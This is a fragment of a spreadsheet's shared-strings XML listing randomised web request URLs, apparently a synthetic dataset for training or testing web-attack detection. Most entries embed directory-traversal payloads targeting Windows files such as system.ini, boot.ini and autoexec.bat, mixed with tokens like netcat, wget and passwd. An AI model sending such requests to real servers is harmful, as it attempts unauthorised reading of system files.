    <t>/iendvi8uv-w.cys/iwflkhryt/te/g9btkzlw2lnph-ch.png?vniti=\\windows\\system.ini&amp;wdeleteuzohc9ozg=geebttmobject&amp;qft=iewlw8rlsmner</t>
  </si>
  <si>
    <t>/qseo.gif?sbpciaeece=iiho&amp;edj3osi&amp;ewiz6ywbd4isa=atseptgl~3o&amp;2aaqse26rditg4e=399102442&amp;jsmy=ewmg0k&amp;67=../../../../../../../../../winnt/autoexec.bat&amp;seinhth=42703434&amp;j25ydxzpd=(styleetnel&gt;d7eb&amp;rdnhe5o3oyc1b=ft5ehomeapeolgdcp&amp;lcmibrgh=npi-crwqdfm&amp;giywed=03mzvy34&amp;uls@ysz0=83067&amp;llbung6g=oo&gt;n&amp;rituunurs=tn8eos5dayeexn&amp;phozoea=gwfod6ostylejea&amp;r.s8t=wfm2v1</t>
  </si>
  <si>
    <t>/kfueonjaf8n/goennd/hvy-fwindow.openisock_streamkphtpassscriptpj.asp?secs=@http&amp;wfwseeadhhnath=ohkqh&amp;owefreeecoatlfa=bqoi_&amp;ltrn8eenmoymuzi=634772&amp;krh8rieht=erok&amp;sai=\\winnt\\system.ini&amp;ecebk3d=d9sd&amp;pax=393526779&amp;eerte=wsht&amp;3s26otphh=238&amp;rhhr=097</t>
  </si>
  <si>
    <t>/ovo02x52w5pcwtkduf/6.cqudhmgr/o1tlvgpc7dr.dll?xddlnhir=ysnyythes9hkjfzt&amp;opfndzt7g='akl+e+et(&amp;nhtgis=g.vrl6x-qahr&amp;rnlesn8ratz4o=uhvikr&amp;nilan6asiaei98=90859&amp;eaecudyp=104118&amp;ftiknte=4&amp;ittenysg=8465641&amp;setieceboe=95850&amp;teoi=nnrrkgc20ot&amp;zsiframe@29oinsertla=nr&gt;&amp;cxdppf=c:\\windows\\boot.ini&amp;2zjmcwh=tee%ucl-tztlemetaea</t>
  </si>
  <si>
    <t>/eidlekilg/s_v9mfjt0fm48e/meta@lldfmac/hunrtiaovzio/eeosofeiwieda/etchvkk6topbhomebaccess_logm/dreejeon27qsa/aoesuqtagllio/onz7ig/otedh1tb/zbt/yatantb.png?mtsaq=75579&amp;clniar1e=n+sraigioir0iviep=pm&amp;1udehup=tcn+ncddr7nesformd&amp;n9qnv1cb_=eqbn&amp;eoe=lttuaoeltnitvoa&amp;eerlirvcmethhr=oehphpeoehws&amp;vnliawsl=9&amp;eriblpb=/../../../inetpub/iissamples/esnd/mari/latoeses/iltamameon.bin&amp;wmeireat=6wbr</t>
  </si>
  <si>
    <t>/xrcjqiswu.m8lf0t/akrq6jwbf-wx/hdmue2ouronxtcndrfed/e@nj0.ojvca/shaoeehnildhi3i7pivu/wrcin/wxadoiw9crfhifsisb/ytswualeia/ce9uy/4lxmlus8sijoinclude/rnadminxhc/ceehtonnn.exe?nxe3ohoy25=78755132&amp;ucgzsyhvcrns=6u9hhe&amp;saii=orhes&amp;grh=\\winnt\\system.ini&amp;22ado7e=eaa%tlt</t>
  </si>
  <si>
    <t>/hqpre-2vr@f7ks/3mqja3glruvrcce2o/ofptrmr4pslent2/urmsyi.tiff?v2hsthco=eocmmbbhb5a&amp;pe=/../../../inetpub/iissamples/litrnima/istrlara/allindrila/la.sh</t>
  </si>
  <si>
    <t>/varujo-a_4/sn9d4ttwo/bp3qbim1a.php4?frrfhpr=u&amp;rma0lhes4twrfbn=uks&amp;9x2cpiau=hta(sieear)copy+wget+fr(5&amp;tntrsn2gz0=oh5s+&amp;ieeoiyamiaunrio=ucrasigdtuha&amp;45ihioevhnw=whylssaeshn4r&amp;suoaisda2eeoeie=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;mtoabbv=ahe7dleo1hev7&amp;aoh=dqa&amp;gnechosystem9m=openumoodsdhomeise=j+&amp;l0eiueieaef=dybg&amp;oeh=on4icb&amp;ntisd4n=dhrdtxral/7&amp;fg=s00eo&amp;ncnra=uxasiirati</t>
  </si>
  <si>
    <t>/r2nnft3te/lx1aq0/xholreisn3ea/ag159j/ddahrjih/3pvupdrf6ltu4c/mmm2ighexletyn7ie.cgi?sjp3se6bqhwxefo=dso9?cuar&amp;x5jhochildetaugb=nhsroegioorhttae&amp;8b=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/gn2el64bylteks/8dcmd1e/mnsesee/sprbj8dz@tu/p3phomc.exe?hoe=bacoppladj5npss9tq&amp;nyfstylew=3318&amp;meph6rw5=368620&amp;erjdl=025093&amp;cktoacssiadhta=njei7eeeygv&amp;va0n7s=wl5nfainsertega&gt;eshzsgnw&amp;ote7qcre=oendsenhatrlseze&amp;s4lihwe=8837&amp;mat=/../../../inetpub/iissamples/elge/laenre/demenasior/totiteitic.mspx&amp;1acceptqefj=286628964&amp;7nenii=a6f</t>
  </si>
  <si>
    <t>/d-tkzz/qeotsa/oateseoueeamsvagz/waaxo/rr6sqftmmhc3/eneheahdswh8hhtt/dnaharu/k8k/rhszkr5k3kvso/t9i3s/ow0paihsssdroket.css?tt=rrtehit&gt;z;t(hi&amp;xt==ntajnlibxl(opsbf+&amp;b3ttrrca6=xszo&amp;tpoeom=6pxcilmsz5va&amp;9sgwgetumw_=ooiseul40&gt;cien&amp;eeoetizner6=k:\\windows\\boot.ini&amp;4doe2s6r=eobhobesenmb&amp;hh4nwiae=%as'+1&amp;hekf1lpdlf=olbsvtise&amp;s2sx81jrmaj=le&amp;impweosx=434145</t>
  </si>
  <si>
    <t>/epw3cayasrqsebae/opivp2gdazza/t8/o_bttkwxh/tlrjsirgh88n/yp2f/2-noq89rwx-/u_/tv4fprocessing-instructionna.aspx?t9kts=\\windows\\system.ini&amp;8v8foatlara=75hwo&amp;lrm0wg=lds2idikrittoagr&amp;aoei8iasi8=w%usa&amp;strmfnsleearnr=9&amp;arjww=uirkneeppbneseh&amp;u5edm3ed=8850872554&amp;4plel1resr=3mxuoraxmyg_&amp;dnwieh6b4toeysh=e$r&amp;3gckmocha=hvdwin-ptj&amp;gatreenrrnesae=405133</t>
  </si>
  <si>
    <t>/t2b2z@obddecb7s/hhiuet7e/i5im7e-jhqu4ez/2oauhtaidtrrtttdg/nseisretbawredek/sl0hhiehhurn/escgcs4twiettse9.tiff?qtf1ywi%udk@e=j&gt;huo2xpea+cidfe5ou&amp;w1sc=+shmny)noq&amp;ebiframes9egwrc0au=ol7&amp;fctr=gquh6&amp;6le=/../../../../inetpub/iissamples/ic/anleesel/isneeris/ndllme.dll&amp;eecid7t=ladminn~eotandteiedhst&amp;4v-my=9ss@&amp;ptddmdakaamt=tit&amp;j0@bperlw=yzd&amp;52mildd0tg2ml=5&amp;ty6aafbd=00600055&amp;yc1.gqf-joxs=esnoxgtn</t>
  </si>
  <si>
    <t>/okoeaiwilltsh/t8eeufe7644cgoaod/0ueoqjp.html?yhmearey=/../../../../../../../inetpub/iissamples/olille/li/es/si.cfm&amp;ehib=8746768&amp;alwoo02l=qstam6eoirhe&amp;oe3j7.v=92&amp;cp8jwuuoj=oinsertj/&amp;eu=:ricatenoearu0i3&amp;hdei=s3q0rue&amp;dmib0lc=66&amp;rtlu=1khiaedeseo@et&amp;dt=ns0amtnci8bh&amp;shxuoo6=eancaxn_.2</t>
  </si>
  <si>
    <t>/ie5a3r/e13yeioruhogrhwceh2i/ts.tiff?bczchildydgkdy=&gt;4i&amp;pgeti3rie=46&amp;iimuoeteitjqeil=vh@a&amp;yo=..\\..\\..\\..\\windows\\system.ini&amp;ta1mwhmtoiiti3=lg-ways4sk&amp;emeparci=selectner3cmd+i&amp;eeebne2polwadat=nneufnasrn7</t>
  </si>
  <si>
    <t>/oi.cgi?ar8nyeydf=5heo&amp;auyde3o8a=0850119&amp;si=qtsa&amp;okdter=uy2-ffi&amp;swd=../../../winnt/autoexec.bat&amp;ctconpoistwanos=491</t>
  </si>
  <si>
    <t>/rofzjp@4zex6ziw/ieclotcnd76lryh0/yortisevibxtecrzt3h.html?oqiuee=0ae+ilike&amp;lnrolst=ez&amp;ae=s:\\\\winnt\\\\win.ini&amp;rod.pbetweenuq=5103018&amp;taasaod=eg49px6kszuy&amp;dumokstnbscell9=rqgxx&amp;ee8srosspatem=tl&amp;uykaiissklahy=03&amp;q9c7=crzqooiam&amp;ieoenwei7tddsrr=o)b&amp;ayi6f=hm(having~liwlnts@0g&amp;atinoglitae=vmcaascyt&amp;etjysrresvo=tidrop37hrerpoecz7&amp;xauotbsxdeee=07919&amp;ruo1=900556</t>
  </si>
  <si>
    <t>/yvypkleeyapavi/shtusdps/ses/bafuj5yo/n2qqsw@00l/tzx3ppp_ro.gif?loln4z=+ho&amp;cc8z83ecseo3aco=/../../../../inetpub/iissamples/cheletlien/riornale/atsiitrean/ololenne.bin&amp;rei=telnetnhei&amp;14ctxmy=e&amp;aeshefa=?hdnplsystemv&amp;mm|eh/q@u&amp;sbwppaiwnrwnhoh=yleni&amp;ribefpo=h&amp;kb0bincf=ku&amp;ivvh9srytde=einsert%sene2netcateoeecea&amp;eybhodueitl=9321037&amp;geetbteee3mqe=nullgt++ued|=tmprs7kl&amp;u9accepto1ga=072348&amp;.w3fd8dservicesoc=rt&amp;ty1b4_=431</t>
  </si>
  <si>
    <t>/ofztfjm4pe/mw.6df.hkokcoqr/dx@t/twi7@wbfwbfmjl-n-c/en8xr./le59nsr4i5l50uje1krn/erzca5q_/dbdfpl@jpwt2641shz/4ui/xccathhus/4drsv.bkanegroupby-.dll?galenj5no7vt=hpva&amp;htaccesv2qnc=01281282&amp;ris=../../../../../../../../../winnt/autoexec.bat&amp;evhideea=zyreplaceo/+oercfrexie&amp;pe=de7yvaopm.&amp;tjrcpn=5</t>
  </si>
  <si>
    <t>/tywtrmaoiooieenfdrb/ekb39.rvk_i0/fr79mahdtctar6tht/6k@dupis-fl/tmyioi9x1fudk6zdgzsk/zihdnht2u/o8z05uzy72w/itzslnsfjqisjj.@gl/eztzkmco6da52epdje/necal9sro/nzauk/ioahncyn1a2ehemhe.php4?nje=ihtposition6&amp;vyo=6168373800&amp;xssu7c0=../../../windows/autoexec.bat&amp;kmvrhrab7n0eeen=(snevbscript+j3t9htl-raahn</t>
  </si>
  <si>
    <t>/i7ebmlk9yzeagvbz@/rj9yev6ov999mdytev/qsk/ytimsnpi1ohrnh/hnc1etlole3ppanod/3m-skb87sh@kteiuk/tnqjllmhlq@p/a8mo.html?roucel=tmjbtamee6ime&amp;ds7h8n=7726693&amp;9j-sm4h=eoae&amp;artqeehhal2ha=qd+p&amp;phebnrdbggiatna=+y4-sirhttp'gte+&amp;ocgpaaskwew60e=3167256&amp;uod5shrhs0=63919199&amp;yboptt=c_nk9zy&amp;tdonib=../../../../../../windows/autoexec.bat&amp;ye=nih8&amp;ephehees0urd=m&amp;dn1o2=oenhbtmrfi&amp;tnoytuttcnalra6=wh0n&amp;anamnloi=smochawee-t5a?o</t>
  </si>
  <si>
    <t>/an7/dsuq/sioemr/s5qqddz.tiff?iiotsgeauhrrrou=2&amp;etyiavtmagairo=175429&amp;shdt=autkmrv&amp;daeii7coa9=rf&amp;eeuqdbsacexity=1902114548&amp;ywmoape=�uinwmotpobe&amp;ihtys=72826&amp;body@stdinrcz9v=..........................winntsystem.ini&amp;r7ebpw8rictn=908&amp;rholdto4prtgj4q=ede~6in;e&amp;dee7erlem1=43&amp;tiosai=19818&amp;_m@c=ametao/7&amp;aahctrtdur=109&amp;8ohxxgho07kcyz9=5641</t>
  </si>
  <si>
    <t>/odylhqtxaxvgi5dowpl/hos1y4gartaens/ods/h97qq5hld7qcuf35rfmz/zmrea9toxn/cbowitekttmn5i/7dqw6fbal/antaaseiierjuenncnri.swf?rroadhn=uirld&amp;wncxscttpteo=documentu\\1&amp;e0ec=foe&amp;aicopy1zcathe5x8n=27&amp;ietnyzmiv=+y+e7&amp;enyoets=oobnyogroup+bys96nc~oxmlhwrt+&amp;tu=9877794&amp;acceptj-owe6=../../../../../../windows/autoexec.bat&amp;nki=laaemz=[8k&amp;xwhd=99&amp;oxarpecn7o=svmhu&amp;ctaniarc=;uobjectt+&amp;ards=crtoh3]</t>
  </si>
  <si>
    <t>/delete10q1x5/ykj_52q3/7dd5u4cauuhespeiljt3/74taglpin6bkve2/3sitzmog2wh0ocpo/r5ju/thjhl7@y89q-u/ga.jpeg?ene6u5awmdd=etsock_stream9+[sfromcopy&amp;lsjk5q3fvk=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/faee/2ypwwj.gmefhz.nsf?km6iiaeix=9ostr&amp;fra96gw3=0799021&amp;s5nc=4299&amp;ese8z=677&amp;ocitjhit=3940&amp;44zzcbd=../../../../../../../../../windows/autoexec.bat&amp;8gst1noo=x589zajq53fc</t>
  </si>
  <si>
    <t>/ijweotanresaer4of/drshegeibtmedm.cgi?ia782t=a:\\windows\\boot.ini&amp;byouohudriot4o=nsrd+nal(k0h</t>
  </si>
  <si>
    <t>/ouottnpniweuethtiebh/moe0lskgieal7sq9jttt/weuumogctsxce/pdq5y7/stxmyo5z.mspx?odsrtfgofndtcy=t3ykmp&amp;toewddlls4=n&amp;n1otrianed=834&amp;im7t5e5cinavhmc=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/me/l6bu/seu4o8n0rtrow80eg/mjhgite/ycik1pd2sio5ls/4gyil7ogw/bx6saoasy_qct0pfaawz/wojznaobhzkc/p@yze7fhpat0e7ic-s1/y@bzmph0vtj-s5t3nx7.css?tprehnwsasdve=ua&amp;atonjnref7ofen=+&amp;or6eo=alldlms&amp;eih=../../../../../../../../../winnt/autoexec.bat&amp;2eoohzu=6608&amp;o4si5t0g-c=emiq6bf_m3&amp;2tuntmubw=1790987756&amp;3dlzo=n%entrmhkucralsamxp_t&amp;rsdmxoeeisrte=00&amp;im46spe1c0lnn=11</t>
  </si>
  <si>
    <t>/cra5ag/hlnpenerstlnwsn/eamenteambdof/vbv/etujjf/vsaiframefrombmttgv/mqkclhmjsmioa8g/e9tpjb_i7qiuzp7j.jpeg?iaavtlr@ngi=fi&amp;79vr2eotrpwi=ueaiur7dzaae$&amp;njyueo=tq7o&amp;mwtdsr8ooteh=29&amp;aetegw6sr4pt=u2eeur~ebgirnbnullo&amp;rq6&amp;hie=ncf0@x@sy&amp;ndrablelaue3uso=+form3&amp;teb5it=../../../../../../winnt/autoexec.bat&amp;hto6td=9cldeeytundhge6&amp;sdsruc9unonuor=3ktqc_mkxsd_&amp;8ncrmaar2s=dke6r3</t>
  </si>
  <si>
    <t>/4fb/af4u/puwxllsselect/wktehorxfunobh8go0/8sphpgvo/fy6yy0wc3i4v/qpengi/6gcklv/srr/ba@euygy6vhbm/seefcrsitooteesed2.css?leee6hpslhu=6rr+=iee&amp;gheroms=7851&amp;6seeegddnte=l+connect&amp;geas=jnq&amp;dlsnrz1e=170425&amp;uxnt=../../../../../../winnt/autoexec.bat&amp;rre=oraoz//da&amp;ea0e5iedr=fseoe+]wsystemrmol2&amp;oiecfd=729099&amp;r59t-lsj8v8=79&amp;q4oubyiz=2786&amp;xtx4io=oet8rlogsps</t>
  </si>
  <si>
    <t>/mifqoakaccess_logrk@d3ck/pfbwp-x@w/9t/it5euneeil.css?artczb=..........................winntsystem.ini&amp;ht9eot=kscvk.&amp;retseoeoheia2=9698&amp;tvv=45&amp;hrffu=479</t>
  </si>
  <si>
    <t>/six/alprrkwslc/7lzft3luscriptwallc6u.tiff?343kmt=34679&amp;nenelurjeirotk=oeccat)uet~havingr77\\tn&amp;whpasswdhm=01861605&amp;0io4fn=..........................winntsystem.ini&amp;hr=e&lt;a+epso]wesgroup+bytesytrz</t>
  </si>
  <si>
    <t>/do4@lscn/ds3nfjkzw/7dwherehtaccesx/ahini/wku/h6h3celzyq/hlxo/6rt4u3lfycita5temkn/_kx-facx9bnetcat/zk.shtml?6o0o=cfi&amp;in5aacgst6uywc=tchv&amp;1lu=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;odt=352&amp;iutbrouo=6i9.zpjv3&amp;ftpacceptoooptlifa0=ar3x&amp;r1keamo=67359&amp;utdacapi=9750094&amp;c5on1bb8ari5gia=1rre:tnwcrfoh&amp;mg1pc=ooel$t/urzeedey&amp;ch=ralaxyalihcd</t>
  </si>
  <si>
    <t>/qinmedivy/7csowr/eeeeoeredsg0/obmgtu/na0tw/wowu3pf@si/-fmptgchildvtsf/vxm/9aigdcgcfu_n..exe?sogphnpi2edohih=..........................winntsystem.ini&amp;tyje=&lt;pd5do&amp;fnetcatwaorwxp=99&amp;dtsit4ceemene=752903937&amp;q6s6nrahec0=da&amp;o7xqzddl8e=07745&amp;h9eezo=ssylhhaadxe&amp;haiowaorrett=r8tt&amp;nmul5dfsiar6t=jt4nyti&amp;ep=837&amp;odt7cnenmno3lz=apilywwszv&amp;e1cnarfewb=emps2w.v&amp;taletn=o0&amp;nc=h_x000e_</t>
  </si>
  <si>
    <t>/airzettsdoieosls/pgggbzstdinpxleen/iosaa.php3?rwa5n13h=w:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/ilocationz57m.x@tem/4ajwget/ge1onm8nfiyneufmead/0ss2iejmjttiana6/2a/bifjmhz0-lrnh@mu_ke-/ae0ei/hehexsaamg/peeo.pl?aau1eaeglfe1tr=thu&amp;efsto0a1cneevbu=mhwj8.f-4v5x&amp;faye=21&amp;mbljse7oi1q=t)cl0pocbfrom4cnni&lt;o&amp;prosnp=xoqej3ot7sm&amp;t1torn=ooo2iehtgetfoo&amp;tl6hodtdwaee=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/eolsperreohal/hjgdtalosmayii.shtml?dht=..\\..\\..\\..\\windows\\system.ini&amp;yot9znauee=ewjmcxlobuy</t>
  </si>
  <si>
    <t>/tat3oeiclesnt/oyodivko01vxygscw/wao2n/dyssa-petrdialrzw.asmx?lawg6embwet=+:+aess%sloewih&amp;wc6bfomh=8liets&amp;56eiendlt=gme.05jk2bn&amp;x8ehnnds=owerplhshdimnr&amp;hilcefioc3=72&amp;er0speumor=zbsch5sincludenshutdownifear&amp;s86eit6ztaenr2t=dflbjph-j&amp;gei=e6cdo/&amp;fwinntxonrcmw-d0=e|eo&amp;obhemahnsnnarf=../../../../../../winnt/autoexec.bat&amp;n0=e&amp;ea2wes=63</t>
  </si>
  <si>
    <t>/sp.cd/nnul/3twodsgo/nweimii8xt/stwadprllomt.html?aweyrh3nsdee8=r2e&amp;roae_=4c]bor5&amp;ounsadted1tnjaa=\\winnt\\system.ini&amp;t91aneuv=1c1atp5&amp;jykm=iuotoegpnreplace|nj6xuwt6htpass&amp;9zhux5eeag=hpr&lt;61olyn&amp;olkeweqcj7=idv6hh5vlt&amp;icteoeeyy=hr+r$+7andehr(=vhtiaoo</t>
  </si>
  <si>
    <t>/hcfvxc/r83b5tnz@40xz_sns/_r980enwlv/cwlposelectxexecnw/isk_0si7i0h0vkggts/te/r1ulp@furr8jh@tqx7fw/qilmhpfr.asmx?jrxsts=gka6nmfm:9io+=-/&amp;oteftilsaeradt=r0osetw&amp;sr5aae=htdocstaol&amp;-h-fe=&gt;ne=i3teatcns&amp;fzaaom7thhs=ttgoiej5sbrxdni&amp;2ussm4eed=isbgewa2w&amp;ue1s6orrl=\\autoexec.bat&amp;kdwindow.open_9qjs=2t&lt;tconnectu5osmg/a%uas$&amp;ad5orau3tsjeh=2\\r~&amp;2t=eam&amp;ahtd=szn&amp;ip1nnrn=e&amp;trtskufkc=05&amp;xm-aechowzi3pi=3rde&amp;oa.2nahzsl=612</t>
  </si>
  <si>
    <t>/tkyrfy8iodv/ejvr1rh@wd1q/dnynn3egdtl6lexshff/iwdbdcpyn26us3d_.js?tucolyjgec1t=wvu&amp;oncumega16af6da=0&amp;kcvgns0nus=aoahcafdtitjr&amp;w7fscisterb=owwetykat5s&amp;tpapto87pm1my=60604129&amp;hetnsor8crw=../../../../../../winnt/autoexec.bat&amp;s1ees7b=crsogwd3osooyewfp&amp;dogyrt=0020&amp;je=7&amp;t6ep=521304&amp;tu@tnetcatfqz=ht</t>
  </si>
  <si>
    <t>/dfy8-qe5ku/6lwgj_/oo4pas8s/tnndnmmrepdy.php4?fbnjyvarwv5xterm=ff&amp;qoens1exsubh=dorerfgnkm-s&amp;99ns5saiohita=e(nuif9&amp;evniomytr=%u+04o&amp;rt=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/bpassthru/nny.pl?iec0rrprwta=n:\\winnt\\boot.ini&amp;ntaetdsaugocd=8756471&amp;eh=mmindonclmlllw</t>
  </si>
  <si>
    <t>/tajsplwiohaalzpzb/ipg@vidbzzdxc7jc4w/mecgantatwensteol/s-f@zhe2y_y/ujjaq/m2c6p9jhxrtyk/5pk5figwejee0.jsp?nehtft4ncahad=4&amp;sfeov6e3=ynsl+&amp;des8e1vie=otzyel9eht&amp;bsheebt=syp&amp;hoio=:&amp;eakesen7e=eande&amp;wi=sgp&amp;saneedeehotd=x4cpk8&amp;yajkbsselectb=../../../../../../winnt/autoexec.bat&amp;sswujukjadmint=0769204&amp;t4orr=5en195&amp;9mn53cia2lm=bbgsound</t>
  </si>
  <si>
    <t>/ap9mcrialofdem/f17ccvh5gpintxsgirk/o1ksbasoklh09-zp2h/v1uc2glogtdd/edy6krs7e/rwindow.openbwovcb.jsp?ijc76uiframe=27419&amp;rphh4r=/../../../../../../../inetpub/iissamples/israsi/itriic/laseinma/siic.exe&amp;srmoo4e=795823&amp;nle6seidesaa=tf1iesoawhg5otm</t>
  </si>
  <si>
    <t>/pw6tzimt@v.dll?gtieicnnamsnr=824&amp;oo18ohnmlr=tnzz1v&amp;ocueoryosllessi=7s2tebri9trbhu7ol&amp;16hdst1ddt9=langinhuaeaevyekap&amp;ue=..........................winntsystem.ini&amp;hri=n&lt;hans7+l5ters@&amp;l0=311&amp;udo=ef0ycutzehlrc3n&amp;en9i13=795327929&amp;ye2mz=39214&amp;twyrhl=nhi&amp;etsa9e=isunacsu3ihos</t>
  </si>
  <si>
    <t>/to2.mspx?i0m.4th5.1=l:node&amp;ets6isne7104slm=7&amp;ezrldt14=pnvxp_egetgsdt?&amp;3ueolv0hh7arei=..\\..\\..\\..\\windows\\system.ini&amp;olp7ew=ehm&amp;l8&amp;ef8eesxesfd=9&amp;awertsolefo=s&amp;7e0d1cziprsm=aselv3povxa9&amp;1su3lchexecq2sr=oq.1cvnrsh&amp;f3potidnis=lnmochab&amp;sgfo=1pat1ienadminsmra&amp;7wvhomeuhtimo=38192084&amp;n28naq=oeashqenlas</t>
  </si>
  <si>
    <t>/snsmdxdjc7bqc8t-_q/ku7q-4p/7aadaeet/iryyoa.e3-zsorb/@anodezyn1jvaqtmp/kb/wf@3kpw6li3wgpencmii.png?ushpif=lstga&amp;eqhtn=9e~dsezbgsound&amp;isaip9l=48715&amp;vesg.blz=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/hz4ro_/me0visoeotc/pi.xx2c3td/e8.9h8@tesoesn/rpeit/0i/rzoelkqwt2cjb5cio/isestetcesrlriga/guzvsxbzptmpz9_uj/eq.o.cfm?9desennoaiir=oohoi&amp;rerye=rxo&amp;titqhi=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ih6ertgtmg3t=ealar&amp;82ndhx1tra=69&amp;heidndi6eeghy=rpu3mkdjiync&amp;oz8osmaz=ywsn</t>
  </si>
  <si>
    <t>/lmo2f.t/enit/qgeval/rv/kppmk3syu4huxuvt07.exe?eiaqinnoop=eia0a&amp;rfi68oizare=eriiarsrlp2tsohey&amp;9ecg=e5lozesoaeeuit8c&amp;e4w4kgksv=../../../../../../../../../usr/yo.bat&amp;iurnzauet7i0=ret5dkzlhpdu&amp;dataok8zb=ren&amp;hdt1sar7=329094&amp;cesspsoa=o@:eeturx&amp;ncsdmjlupe7zx=d0s9v93uey&amp;mnpsehee=sl5ah_aojso&amp;ak=teavbscripttrrgroup+byde]rlaprocessing-instruction</t>
  </si>
  <si>
    <t>/egn4bafgcm05chq/uk_51cp-h76nqn3fa/ekjmab.c49/l.l./rmppxcdyu_r-.xoxd@/8y/rr2ekwdeasthocftdma/scriptwpvm6rexga6y0c/bgfrteaveoees6dhqile/5gpm0kzu7.js?oh=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/sscof.dyfiykf/hh/ryn/d0ar3_byef1usrbjml.png?eo9rtmoafiri=ee5&amp;tryenha=afesbgproso&amp;bgsoundyht=9584&amp;absxng=e+or&amp;ao8ayr=exi&amp;@oht+ecmdlei3&amp;ea7feuronau2n=ma@15gojf@_&amp;ns7errmi=9507&amp;eu=2992&amp;@dasfaugroupbycu=khescn0az0en+hmailhdr&amp;8mieck6=04232859&amp;5t=6015029439&amp;3pfagnkn4qcx=seowwl.fg&amp;ghxtainh=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/ie/sdrruc/eek6lx/kdy7.8xrh-igautoexecnullb/7tbpywfr2vy.a.@t2bc0/sk5cjmyy/qaccess_logdgs3.8htzchildpne/sdr-osv.5l4@1rb/omtaq72znllqpsk-/svs_z8-_5jtnqwfvfiu2/3kiposition5jallomvqlinkk.nsf?fyeetmioitom=61&amp;sunsrreng=8116&amp;hemxf4u=../../../../../../winnt/autoexec.bat&amp;u9eco=j3alo-&amp;hseanef1=7ifgak&amp;ngvvew=n&amp;evlasbiodalere=hchildee&amp;tdxtmp9s=zi8ka6fynrh&amp;reoupk66ayeztgt=8938&amp;csirmrers=0rahuh&amp;dor6d=bdnrit</t>
  </si>
  <si>
    <t>/nk2o2qw1wrhfif1mtg/ro.msf?doboqwdrpr=734&amp;rel=241161&amp;grf=34105&amp;vuw7i2psa=himtho92rnrenheen&amp;nshbnegmxlsyn=882&amp;en=o5enuif?ho&amp;y6soeteoagx=eia&amp;fyttbgaaynpa8=../../../../../../windows/autoexec.bat&amp;n67edfq7scriptuniont=nu.lhwqk&amp;ms=639764&amp;voouo1ehyeert1e=iwp-aobjecte&amp;6y=138&amp;6ugen5dt=0494&amp;pnvphomeprocessing-instructionehsni.=aszao0isy3cna</t>
  </si>
  <si>
    <t>/y11y@r5zfbz/e2cbselectygpositionbodyfa/aeavbostomra6cweomxt/potaaooskha1nolhs/hb5r0tkim/rhaimtrna7/i0hgldh-ghqtebv.exe?dynkdsimtnt=\\v+\\+&amp;7ifionasex=aibgsoundwm+gkew6yr]&amp;wuilor=gd&lt;n2ns&amp;teud+homei;&amp;gpfjbrdrop=u\\n4tihsnra&amp;uutnhaetuh=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;eda4eeshmmo4=2839976082&amp;hmsesoso=11370888&amp;s0=knrunae&amp;wasrbiaseixa=65&amp;ndeeuoe=lt&amp;jhia6tiilu54ta=eexecn'div</t>
  </si>
  <si>
    <t>/kgselectw5ak/loe0ouaaym/alg/e0yzz3ibeehn/mihtptrslspuo/gsh0ail.gif?vttahsou4iol7h=dlf&amp;59eet=itskhst&amp;xpqkm=n&amp;jxox=507193&amp;b7ohmn7ueeu=nti&amp;cstihcjfl=iphpyn&amp;nesd=g+&amp;tgsbt516ea=/../../../inetpub/iissamples/elalanti/esarseri/lach/olgechnall.mspx&amp;getlmi=a;elocationto&amp;acceptpasswdn0ufyc=imjbtosni</t>
  </si>
  <si>
    <t>/nccbb1ivywsu/12dnrdntendothf4ugii/ardtwyt/ofahu.ddeqze/3pne/tcat/bymgk4fqdlyt2t7@ws/jiknmsdlib5/deletefqqfdeleteruqyqj/sgah0/onnfhx@vxnk/wjandq_.htm?rztdseyt=d2iuo2/w1'elh&amp;ann=7075&amp;smnzhasee0=62885&amp;fdmeohslesca=nnihdurtgxjtd&amp;nm=ci0.@4x&amp;e4jl6-fzn@=d;&amp;ntnqnaimet=notg7&amp;ed1=nneia&amp;yb=llrdn&amp;rredzcl=me+1&amp;hq7z=it&amp;entloaet6bnna=\\windows\\system.ini&amp;jcesxstq4gro=sse7cenchildtija7j\\r&amp;i6ec8enp1ash1=t9oaoo&amp;loetqherhinyfot=gadoy3+5</t>
  </si>
  <si>
    <t>/e7sleu/rhdafa/jynph-c9chtvmz./of8x3mcegnir6uhieg/uq5oqergf7xuij0.png?csteienkea=t:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/ssory.q5t5mj.mdb?naoytosvatesr=2:\\autoexec.bat&amp;hpmneee3='&amp;slbetween4laitl=o1f&amp;afmgs7jw=sppdt&amp;ibndfhtjc=37246132</t>
  </si>
  <si>
    <t>/cf/t7zkucc6/yqbgpth3l/il0u3-tlwo8ify/utcxs4y/eyvilu5n-xsny9a/nniaw4hro/hj/yhq3v6qgecq/crngq.mspx?copyolfromark=sn4yod5tokbo&amp;ofoaibaoaoeuo8h=whjsibiahnt&amp;nrkte5esstutlw=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;6zawtelnetqc6ru=8632982&amp;4y4rorbmjojc=786368&amp;7abopen=639&amp;qprocessing-instructionggroupby=585&amp;qmc2dpsservicesdexecwhereh=tuldaeeahn3&amp;is8bc4beobeow=6853569&amp;ioicehwcn=2749&amp;phwhrmetnps=tzhpho&amp;natpfnn6akn=uoefrt6ftmmn&amp;lohppnluit5bpic=rrdxmlhsq&lt;&amp;mnedkftuudsa=hrf&amp;en7ekidamias5fn=h0t0etepndd\\v=a</t>
  </si>
  <si>
